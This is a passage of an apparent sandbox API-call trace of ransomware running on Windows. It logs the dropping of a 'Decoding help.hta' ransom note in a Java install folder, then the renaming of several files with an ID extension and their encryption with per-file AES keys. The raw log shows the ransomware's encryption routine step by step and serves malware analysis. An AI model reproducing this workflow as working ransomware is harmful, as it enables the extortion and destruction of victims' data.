ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22a2be7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 0 [0043.520] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 155 os_tid = 0x7b0 [0040.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*", lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5930 [0040.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.242] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.242] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.242] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0040.242] lstrcmpW (lpString1=".", lpString2="bin") returned -1 [0040.242] lstrcmpW (lpString1="..", lpString2="bin") returned -1 [0040.242] lstrcmpiW (lpString1="windows", lpString2="bin") returned 1 [0040.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.243] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="bin" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin" [0040.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0040.243] GlobalMemoryStatus (in: lpBuffer=0xcccfd10 | out: lpBuffer=0xcccfd10) [0040.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33c8250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x250 [0040.243] CloseHandle (hObject=0x250) returned 1 [0040.243] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x0, dwReserved1=0x0, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0040.244] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.244] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0040.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0xffffffff [0040.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x250 [0040.245] WriteFile (in: hFile=0x250, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xcccfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.246] CloseHandle (hObject=0x250) returned 1 [0040.246] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.246] lstrcmpiW (lpString1="Decoding help.hta", lpString2="COPYRIGHT") returned 1 [0040.246] lstrlenW (lpString="COPYRIGHT") returned 9 [0040.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="COPYRIGHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" [0040.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" [0040.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.[ID]g9uZrLhJaygpwRm1[ID]" [0040.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x250 [0040.248] CreateFileMappingA (hFile=0x250, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x254 [0040.248] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x5ae868) returned 1 [0040.249] CryptGenKey (in: hProv=0x5ae868, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x5a58f0) returned 1 [0040.249] CryptExportKey (in: hKey=0x5a58f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0040.249] MapViewOfFile (hFileMappingObject=0x254, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0x2d0000 [0040.252] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0040.252] CryptEncrypt (in: hKey=0x5a58f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0xd40, dwBufLen=0xd40 | out: pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0xd40) returned 1 [0040.252] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.253] CloseHandle (hObject=0x254) returned 1 [0040.253] CryptDestroyKey (hKey=0x5a58f0) returned 1 [0040.253] CryptReleaseContext (hProv=0x5ae868, dwFlags=0x0) returned 1 [0040.253] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.253] WriteFile (in: hFile=0x250, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.254] WriteFile (in: hFile=0x250, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.254] CloseHandle (hObject=0x250) returned 1 [0040.255] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.255] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7572f9a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7572f9a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lib", cAlternateFileName="")) returned 1 [0040.255] lstrcmpW (lpString1=".", lpString2="lib") returned -1 [0040.255] lstrcmpW (lpString1="..", lpString2="lib") returned -1 [0040.255] lstrcmpiW (lpString1="windows", lpString2="lib") returned 1 [0040.256] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.256] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.256] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="lib" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib" [0040.256] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0040.256] GlobalMemoryStatus (in: lpBuffer=0xcccfd10 | out: lpBuffer=0xcccfd10) [0040.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x603e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x250 [0040.257] CloseHandle (hObject=0x250) returned 1 [0040.257] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0040.257] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.257] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.257] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0040.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0040.257] lstrcmpiW (lpString1="Decoding help.hta", lpString2="LICENSE") returned -1 [0040.257] lstrlenW (lpString="LICENSE") returned 7 [0040.257] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.257] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.257] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="LICENSE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" [0040.257] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" [0040.257] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.[ID]g9uZrLhJaygpwRm1[ID]" [0040.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE" (normalized: "c:\\program files (x86)\\java\\jre7\\license"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\license.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\license.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x250 [0040.258] CreateFileMappingA (hFile=0x250, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x254 [0040.258] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x5ae868) returned 1 [0040.259] CryptGenKey (in: hProv=0x5ae868, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x5a5970) returned 1 [0040.259] CryptExportKey (in: hKey=0x5a5970, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0040.259] MapViewOfFile (hFileMappingObject=0x254, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20) returned 0x2d0000 [0040.260] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0040.261] CryptEncrypt (in: hKey=0x5a5970, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0x20, dwBufLen=0x20 | out: pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0x20) returned 1 [0040.261] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.261] CloseHandle (hObject=0x254) returned 1 [0040.262] CryptDestroyKey (hKey=0x5a5970) returned 1 [0040.262] CryptReleaseContext (hProv=0x5ae868, dwFlags=0x0) returned 1 [0040.262] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.262] WriteFile (in: hFile=0x250, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.265] WriteFile (in: hFile=0x250, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.265] CloseHandle (hObject=0x250) returned 1 [0040.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\LICENSE.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.266] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.txt", cAlternateFileName="")) returned 1 [0040.266] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.266] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0040.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0040.266] lstrcmpiW (lpString1="Decoding help.hta", lpString2="README.txt") returned -1 [0040.266] lstrlenW (lpString="README.txt") returned 10 [0040.266] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.266] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="README.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" [0040.266] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" [0040.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x250 [0040.267] CreateFileMappingA (hFile=0x250, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x254 [0040.267] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x5ae868) returned 1 [0040.268] CryptGenKey (in: hProv=0x5ae868, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x5a58f0) returned 1 [0040.268] CryptExportKey (in: hKey=0x5a58f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0040.268] MapViewOfFile (hFileMappingObject=0x254, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20) returned 0x2d0000 [0040.271] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0040.271] CryptEncrypt (in: hKey=0x5a58f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0x20, dwBufLen=0x20 | out: pbData=0x2d0000*, pdwDataLen=0xcccfce4*=0x20) returned 1 [0040.271] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.272] CloseHandle (hObject=0x254) returned 1 [0040.272] CryptDestroyKey (hKey=0x5a58f0) returned 1 [0040.272] CryptReleaseContext (hProv=0x5ae868, dwFlags=0x0) returned 1 [0040.272] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.272] WriteFile (in: hFile=0x250, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.273] WriteFile (in: hFile=0x250, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.273] CloseHandle (hObject=0x250) returned 1 [0040.274] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\README.txt.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.274] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746d2260, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x746d2260, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x746d2260, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="release", cAlternateFileName="")) returned 1 [0040.274] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.274] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.274] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0040.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0040.274] lstrcmpiW (lpString1="Decoding help.hta", lpString2="release") returned -1 [0040.274] lstrlenW (lpString="release") returned 7 [0040.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0040.274] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0040.274] 